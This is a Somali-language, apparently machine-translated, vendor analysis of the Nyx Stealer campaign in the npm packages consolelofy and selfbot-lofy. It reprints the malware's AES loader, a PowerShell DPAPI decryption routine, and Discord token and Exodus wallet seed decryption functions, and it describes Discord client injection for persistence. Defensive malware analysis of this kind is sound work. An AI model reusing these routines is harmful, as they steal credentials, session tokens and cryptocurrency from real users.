npm Infostealer

NPM-ka Cusub ee Soo-bandhigista Infostealer: Nyx ​​Stealer oo Afduubtay Kulamo Discord ah

TL, DR

Kooxda Cilmi-baarista Amniga ee Xygeni waxay aqoonsadeen olole casri ah oo npm infostealer ah oo lagu bixiyay laba xirmo oo xaasidnimo ah: consolelofy iyo selfbot-lofy.

Nooca ugu dambeeyay (consolelofy@1.3.0) waxay ku dhejisaa culays lacag-bixineed oo 216KB AES ah oo sir ah kaas oo furfura wakhtiga socodsiinta oo fuliya iyada oo loo marayo vm.runInNewContext()Maadaama caqliga xaasidnimada si buuxda loo qariyay, iskaan-qaadayaasha joogtada ah ee ku tiirsan kormeerka xarigga ma arki karaan dhaqankiisa ilaa waqtiga fulinta.

Marka la furo, culayska la saaray, oo gudaha lagu calaamadeeyay Xatooyo Nyx ah, bartilmaameedyada:

  • Calaamadaha xaqiijinta Discord
  • 50+ dukaan oo aqoonsi biraawsarka ah
  • 90+ kordhin boorsada lacagta digital-ka ah
  • Kalfadhiyada Roblox, Instagram, Spotify, Steam, Telegram, iyo TikTok
  • Joogteynta macaamiisha desktop-ka ee Discord

Dhammaan 20ka nooc ee labada xirmo ayaa la soo sheegay waxaana la xaqiijiyay inay yihiin kuwo xaasidnimo ah.

Dulmar Farsamo oo ku saabsan NPM Infostealer-kan

Si ka duwan barnaamijyada caadiga ah ee waqtiga rakibidda, ololahani wuxuu ku tiirsan yahay runtime qaabka furfurista.

Waxaa jira:

  • Ma jiro wax xaasidnimo ah preinstall or postinstall hooks
  • Wicitaanno shabakadeed oo wakhtiga rakibidda muuqda ma jiraan
  • Ma jiraan wax macquul ah oo ku saabsan ururinta aqoonsiga qoraalka fudud

Culaysku wuu shaqeeyaa marka module-ka la soo dejiyo. Jirka xaasidnimada leh oo dhan waa la qariyaa oo kaliya wuxuu ku soo baxaa xusuusta waqtiga socodsiinta.

Naqshadani waxay si gaar ah uga fogaataa ogaanshaha inta lagu jiro rakibidda baakadka.

Sidee npm-kan Infostealer dhab ahaantii u fuliyaa

Kahor inta aan la falanqeyn waxa Nyx Stealer xado, waa inaan fahamnaa sida ay u dhaqan gasho.

Macnaha xaasidnimada leh ee ku jira npm infostealer-kan wuxuu raacaa qaab joogto ah:

Qalab yar oo rar-qaadaha ah ayaa furfura culays weyn oo sir ah wuxuuna si firfircoon ugu fuliyaa gudaha macnaha guud ee VM ee Node.js.

Naqshadani waa mid ula kac ah. Weerarku ma qarinayo shaqada gadaashiisa, waa iyaga. ka saarista koodka xaasidnimada leh aragtida aan joogtada ahayn gebi ahaanba.

Qaabka Fulinta Heerka Sare

Heer sare, duubku wuxuu sameeyaa afar shay:

  • Waxay ka soo saartaa furaha AES erayga sirta ah ee adag iyadoo la adeegsanayo SHA-256
  • Wuxuu furfuraa qoraal qarsoodi ah oo hex-encoded ah oo weyn isagoo adeegsanaya AES-256-CBC
  • Wuxuu fuliyaa JavaScript-ka la furfuray isagoo adeegsanaya vm.runInNewContext()
  • Waxay bixisaa sanduuq ciid ah oo wali soo bandhigaya waxyaabaha aasaasiga ah ee waqtiga socodsiinta

Soo Koobidda Farsamada Muhiimka ah

Qeybta Qaabeynta / Qiimaha
Algorithm AES-256-CBC
Soojeedinta Furaha SHA-256 (erey sir ah)
Vektor Bilaabid (IV) 16 bayt oo ah 0x00
fulinta vm.runInNewContext (la furfuray, sanduuq ciid ah)

Si gaar ah, sanduuqa ciiddu wuxuu dhex maraa:

  • require
  • process
  • Buffer
  • saacadle
  • dhoofinta moduleka

Taas macnaheedu waa in culayska la furfuray uu awood buuxda u leeyahay:

  • Geedi socodka ubaxa
  • Akhri oo qor faylasha
  • Samee wicitaanada shabakadda
  • Wax ka beddel codsiyada maxalliga ah

Kani ma aha VM xaddidan. Waa VM loo isticmaalo trampoline fulineed.

Qaabka Sirta Waqtiga-socodka (Habka Fulinta Aasaasiga ah)

Rarka waa yar yahay.
Jidhka xaasidnimada leh ma aha.

Hoos waxaa ku qoran qaabka fulinta ee laga helay xirmada:

const crypto = require('crypto'); const vm = require('vm');  function decryptAndExecute(encryptedHex, passphrase) {     const key = crypto.createHash('sha256')                       .update(passphrase)                       .digest();      const iv = Buffer.alloc(16, 0);      const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);     let decrypted = decipher.update(encryptedHex, 'hex', 'utf8');     decrypted += decipher.final('utf8');      const sandbox = {         require,         module,         exports,         console,         process,         Buffer,         __dirname,         __filename,         setTimeout,         setInterval,         clearTimeout,         clearInterval     };      vm.runInNewContext(decrypted, sandbox); }

Waa maxay Sababta Tani?

Culayska la furfuray:

  • miyuu ma waxaa ku jira qoraal cad gudaha xirmada npm
  • Lama arki karo si fudud grep ama sawir-qaadista xarigga aan joogtada ahayn
  • Kaliya waxay ku soo baxdaa xusuusta waqtiga hawlgalka
  • Waxay ku shaqeysaa awoodo buuxa oo waqtiga socodsiinta Node ah

Isku-darka fulinta AES + VM waa tilmaame dhaqan oo xooggan oo ah npm infostealer oo isku dayaya inuu ka baxsado kormeerka joogtada ah.

Si kale haddii loo dhigo:

Haddii aad sawirto geedka isha baakadka, ma arkaysid qof wax xadaya.
Waxaad arkaysaa qalab furfuran.

Maxaa Dhaca Ka Dib Furitaanka Qoraalka

Marka la fuliyo, Nyx Stealer wuxuu bilaabaa mowjado ururin xog oo is barbar socda.

Mowjadda 1: Soo saarista Aqoonsiga Biraawsarka

Barnaamijka malware-ka:

  • Soo dejiso Python runtime oo ka socota NuGet CDN
  • Ku rakib maktabadaha sirta ah
  • Soo saar bakhaarada aqoonsiga ee ku salaysan Chromium
  • Waxay furfurtaa sirta ay ilaaliso DPAPI

Halkii ay ka soo ururin lahayd isku xidhka asalka ah, waxay ka faa'iidaysanaysaa PowerShell si ay si toos ah ugu wacdo Windows DPAPI.

function dpapiUnprotectWithPowerShell(dataBuf) {     const b64 = dataBuf.toString('base64');      const ps =         "Add-Type -AssemblyName System.Security;" +         "$b=[Convert]::FromBase64String('" + b64 + "');" +         "$p=[System.Security.Cryptography.ProtectedData]::Unprotect(" +         "$b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);" +         "[Console]::Out.Write([Convert]::ToBase64String($p))";      const cmd =         `powershell -NoProfile -ExecutionPolicy Bypass -Command "${ps}"`;      return Buffer.from(execSync(cmd, { encoding: 'utf8' }).trim(), 'base64'); }

Habkan:

  • Waxay ka fogaataa walxaha isku-darka ah
  • Waxay isticmaashaa API-yada crypto ee Windows-ka ee asalka ah
  • Waxay isku daraysaa qalabka maamulka

Waa hab-furidda aqoonsiga heerka OS-ga, ee maaha xoqid.

Mowjadda 2: Fasiridda Calaamadda Discord

Tuuggu waa qof og borotokoolka. Waxay fahsan tahay qaabka calaamadda qarsoon ee Discord.

function decryptToken(encryptedToken, key) {     const tokenParts = encryptedToken.split('dQw4w9WgXcQ:');     const encryptedData = Buffer.from(tokenParts[1], 'base64');      const iv = encryptedData.slice(3, 15);     const ciphertext = encryptedData.slice(15, -16);     const tag = encryptedData.slice(-16);      const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);     decipher.setAuthTag(tag);      return decipher.update(ciphertext).toString('utf8'); }

Socodka hawlgalka:

  • Ka soo saar furaha master-ka Discord's Local State
  • Furaha furaha ee furaha iyada oo loo marayo DPAPI
  • Fur furaha calaamadaha AES-GCM
  • Ansaxi calaamadaha Discord API
  • Ku kobci Nitro, calaamado, iyo macluumaadka biilasha

Kani maaha daadinta aqoonsiga guud. Waa afduubka kalfadhiga oo la socda hab-maamuuska.

Mowjadda 3aad: Bartilmaameedka Jeebka Lacagta Dijitaalka ah

NPM infostealer wuxuu tiriyaa:

  • 90+ kordhin boorsada biraawsarka
  • 27 boorsooyinka desktop-ka
  • Waddooyinka jeebka qabow
  • Faylasha abuurkii Baxniintii

Tusaale ahaan isku dayga furfurista abuurka:

function decryptSeco(content, password) {     const key = crypto.pbkdf2Sync(password, 'exodus', 10000, 32, 'sha512');      const decipher = crypto.createDecipheriv(         'aes-256-gcm',         key,         content.slice(0, 12)     );      decipher.setAuthTag(content.slice(-16));      return Buffer.concat([         decipher.update(content.slice(12, -16)),         decipher.final()     ]).toString('utf8'); }

Haddii ay guulaysato, tanaasulka boorsada jeebka waa mid degdeg ah oo aan dib loo celin karin.

Tani waxay ka dhigan tahay habka lacag-bixinta ugu qiimaha badan ololaha.

Adkeysi iyada oo loo marayo duritaanka Discord Desktop

Ka dib markii uu soo urursaday aqoonsiyada, Nyx Stealer wuxuu isku dayaa inuu ku adkeysto isagoo wax ka beddelaya nidaamka deegaanka. khilaaf macmiil.

Bartilmaameed:

%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core\index.js

Taxanaha Hawlgalka

Infostealer-ku wuxuu qabtaa tallaabooyinka soo socda:

  • Waxay joojineysaa socodsiinta howlaha Discord
  • Waxay heshaa noocyada Discord ee la rakibay (Xasillooni, Canary, PTB)
  • Ku dul-qoraa discord_desktop_core/index.js
  • Wuxuu duraa macquulka webhook ee uu weeraryahanku xakameeyo
  • Dib u bilaabaa Discord

Tani waxay hubineysaa in kalfadhiyada Discord ee mustaqbalka ay si toos ah u daadiyaan calaamado xaqiijin cusub.

Muhiimad ahaan, joogtayntani kuma tiirsana hawlaha la qorsheeyay ama wax ka beddelka diiwaanka. Waxay ka faa'iidaysataa wax ka beddelka koodhka heerka codsiga, oo ah hab qarsoodi ah.

Xitaa haddii xirmada npm ee xaasidnimada leh laga saaro dambe, macmiilka Discord wuxuu weli ku jiraa xaalad halis ah.

Isbarbardhigga Farsamada: Selfbot-ka Sharci ah iyo npm Infostealer

Qeybta Maktabadda Sharciga ah Nyx npm Infostealer
encryption None Culeyska buuxa ee AES-encrypted
Waqtiga Runtime VM ma loo baahan yahay vm.runInNewContext fulinta
Helitaanka Aqoonsiga Discord API oo keliya Biraawsarka, boorsooyinka, DPAPI
Soo dejinta Dibadda Maya Waqtiga Python ee loo maro NuGet
adkaysiga Maya Cirbadaha macmiilka Discord
lacagaynta Otomaatigeynta Bot Dib-u-iibinta aqoonsiga

Lakabka sirta ah oo keliya ayaa durba ololahan ka soocaya fargeeto il furan oo caadi ah.

Bot-ka Discord ee sharciga ah ma laha sabab uu ku qariyo dhammaan koodhka, u abuuro PowerShell si uu u galo DPAPI, u soo dejiyo waqtiyada socodsiinta dibadda, ama wax uga beddelo gudaha barnaamijyada desktop-ka. Marka awoodahaasi ay ka muuqdaan ku-tiirsanaan sheeganaysa inay otomaatig u tahay isdhexgalka Discord, is-waafajinta qaab-dhismeedka waxay noqotaa mid aan macquul ahayn in la iska indho tiro.

Marka laga eego dhinaca baaritaanka, npm infostealer-kan wuxuu ka tagaa raadad lakabyo badan. Si kastaba ha ahaatee, tilmaamayaasha ugu kalsoonida badan maaha URL-yada adag ama dariiqyada faylalka gaarka ah, maadaama ay isku beddeli karaan noocyada dhexdooda. Taa beddelkeeda, calaamadaha waara waa qaab-dhismeed.

Heerka xirmada, calanka cas ee ugu xooggan waa isku-darka culays weyn oo sir ah iyo duubis furfuran oo runtime ah oo isla markiiba fuliya iyada oo loo marayo vm.runInNewContext()In kasta oo sirta oo keliya aysan ahayn mid sir ah, isticmaalka furfurista AES oo ay ku xigto fulinta firfircoon ee VM gudaha xirmada utility Discord waa mid aad u aan caadi ahayn.

Heerka martida loo yahay, qaababka shakiga leh waxaa ka mid ah dhaqdhaqaaqa furfurista DPAPI ee aan la filayn, habka ka soo baxaya macnaha ku tiirsanaanta Node.js, iyo wax ka beddelka faylasha codsiyada maxalliga ah ee aan waligood beddelin maktabadaha dhinac saddexaad. Sidoo kale, lakabka shabakadda, isgaarsiinta qaabka webhook ee dibadda ka baxda oo ay bilowdo ku tiirsanaanta horumarinta waxay u taagan tahay wax aan caadi ahayn oo macno leh.

Si kale haddii loo dhigo, dusha sare ee ogaanshaha ma aha hal tilmaame oo tanaasul ah. Waa isku xidhka sirta, fulinta waqtiga socodsiinta, helitaanka aqoonsiga, iyo dhaqanka adkeysiga ee muujinaya khatarta.

Ogaanshaha iyo Yaraynta Xygeni

npm Infostealer

Macluumaadka npm-kan waxaa aqoonsaday by Digniinta Hore ee Malware-ka Xygeni (MEW) iyada oo loo marayo isku xidhka dhaqanka ee lakabaysan halkii laga dhigi lahaa isku xidhka saxeexa fudud.

Halkii laga raadin lahaa xargo xaasidnimo ah oo la yaqaan, MEW waxay qiimeysaa cilladaha qaab-dhismeedka ee geedka isha oo dhan. Xaaladdan, ogaanshaha ayaa ka soo baxay isku-darka dhowr calaamadood: nidaam furfuris AES ah oo ku dhex jira barta gelitaanka moduleka, fulinta degdega ah gudaha macnaha VM, iyo isku-dheelitirnaan cad oo awood-u-dhigid ah.

Muhiimad ahaan, mid ka mid ah calaamadahan oo keliya ma muujiyaan ujeedo xaasidnimo ah. Si kastaba ha ahaatee, marka si wada jir ah loo falanqeeyo, waxay soo bandhigaan isku day lagu qarinayo dhaqanka waqtiga socodka. Habkan lakabaysan wuxuu si weyn u yareeyaa waxyaabaha beenta ah iyadoo la aqoonsanayo khataraha silsiladda sahayda ee kalsoonida sare leh.

Intaa waxaa dheer, kiiskan wuxuu muujinayaa sababta kormeerka waqtiga rakibidda oo keliya uusan ugu filnayn. Macquulka xaasidnimada ah kuma jiro qoraallada wareegga nolosha. Waxay shaqeysaa oo keliya ka dib marka moduleku raro oo keliya wuxuuna muuqdaa marka la furo xusuusta. Sidaa darteed, difaac wax ku ool ah wuxuu u baahan yahay falanqayn ku saabsan sirta, aqoonsashada qaabka dhaqanka, iyo la socodka ku tiirsanaanta joogtada ah ee ka baxsan dhacdooyinka rakibidda.

Ka saarista diiwaanka waa mid falcelin leh. Falanqaynta wakhtiga ku-meel-gaadhka ah waa mid ka hortag ah.

Sababta NPM-kan Infostealer muhiim u yahay

Nyx Stealer waxay matalaysaa horumar qaab-dhismeed oo ku saabsan barnaamijyada malware-ka ee ku salaysan npm.

Taariikh ahaan, xirmooyin badan oo xaasidnimo ah ayaa ku tiirsanaa qoraallo muuqda oo waqtiga rakibidda ah ama meelaha kama dambaysta ah ee nadiifinta shahaadada. Taas bedelkeeda, ololahan wuxuu qariyaa culayskiisa, wuxuu dib u dhigaa fulinta waqtiga socodsiinta, wuxuu ka faa'iidaystaa API-yada nidaamka hawlgalka ee sharciga ah, wuxuuna dejiyaa adkeysi gudaha codsiyada la aamini karo.

Sidaas darteed, qofka weerarka geysta uma baahna inuu ka faa'iidaysto kaabayaasha npm laftiisa. Taa beddelkeeda, weerarku wuu guuleystaa sababtoo ah rakibidda ku-tiirsanaanta waxay tilmaamaysaa kalsooni. Horumariyayaashu waxay u maleynayaan in soo dejinta maktabaddu ay tahay hawlgal ammaan ah, gaar ahaan marka ay isu soo bandhigto sidii qalab macquul ah oo caan ah.

Maadaama nidaamyada deegaanku ay sii kordhayaan oo ay sii kordhayaan, xadka kalsoonida ee qarsoon wuxuu noqonayaa dusha sare ee soo jiidashada leh. Sidaa darteed, difaaca ka dhanka ah macluumaadka casriga ah ee npm waxay u baahan tahay aqoonsashada qaababka dhismaha halkii laga raadin lahaa xarigyo aan joogto ahayn.

Ugu dambeyntii, ololahan wuxuu xoojinayaa cashar muhiim ah oo ku saabsan software supply chain security: khataraha ugu khatarta badan maaha kuwa marka hore u muuqda kuwo xaasidnimo leh, laakiin kuwa u muuqda kuwo qaab-dhismeed ahaan sharci ah ilaa waqtiga run-ka ah uu muujiyo dhaqankooda dhabta ah.

qalabka-sca-tools-software-ka-samaynta-qalabka-falanqaynta
Mudnaanta sii, hagaaji, oo sug khataraha software-kaaga
Hel Akoonkaaga Bilaashka ah.
Looma baahna kaarka deynta.

Sug Horumarinta Software-kaaga iyo Bixintaada

oo leh Xygeni Product Suite